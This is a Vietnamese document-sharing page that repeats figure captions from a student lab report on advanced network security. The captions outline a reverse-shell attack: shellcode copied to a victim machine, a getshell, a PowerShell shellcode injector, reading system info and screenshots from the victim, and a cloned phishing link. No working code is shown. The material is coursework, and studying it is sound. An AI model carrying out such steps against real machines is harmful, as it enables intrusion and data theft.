Hình 49. Chép shellcode lên máy victim Bước 10: Biên dịch và thực thi getshell (Trang 33)
Hình 51.Kiểm tra kết nối và chép file lên máy victim Bước 12: Quay lại máy victim và đã có file tcp_reverse.txt - (TIỂU LUẬN) báo cáo THỰC HÀNH môn an toàn mạng nâng cao LAB 1  THIẾT lập IPSEC CONNECTION DÙNG OPENSWAN
Hình 51. Kiểm tra kết nối và chép file lên máy victim Bước 12: Quay lại máy victim và đã có file tcp_reverse.txt (Trang 34)
Hình 58.Powershell Alphanumeric Shellcode Injector - (TIỂU LUẬN) báo cáo THỰC HÀNH môn an toàn mạng nâng cao LAB 1  THIẾT lập IPSEC CONNECTION DÙNG OPENSWAN
Hình 58. Powershell Alphanumeric Shellcode Injector (Trang 38)
Hình 59. Lấy thơng tin từ máy nạn nhân Lệnh sysinfo và ipcofig - (TIỂU LUẬN) báo cáo THỰC HÀNH môn an toàn mạng nâng cao LAB 1  THIẾT lập IPSEC CONNECTION DÙNG OPENSWAN
Hình 59. Lấy thơng tin từ máy nạn nhân Lệnh sysinfo và ipcofig (Trang 39)
Lệnh screenshoot để chụp lại màn hình của máy victim 2.  Demo tấn công bằng cách clone 1 link giả mạo - (TIỂU LUẬN) báo cáo THỰC HÀNH môn an toàn mạng nâng cao LAB 1  THIẾT lập IPSEC CONNECTION DÙNG OPENSWAN
nh screenshoot để chụp lại màn hình của máy victim 2. Demo tấn công bằng cách clone 1 link giả mạo (Trang 40)
Hình 64. Nhập IP máy attacker - (TIỂU LUẬN) báo cáo THỰC HÀNH môn an toàn mạng nâng cao LAB 1  THIẾT lập IPSEC CONNECTION DÙNG OPENSWAN
Hình 64. Nhập IP máy attacker (Trang 42)

TỪ KHÓA LIÊN QUAN

🧩 Sản phẩm bạn có thể quan tâm

w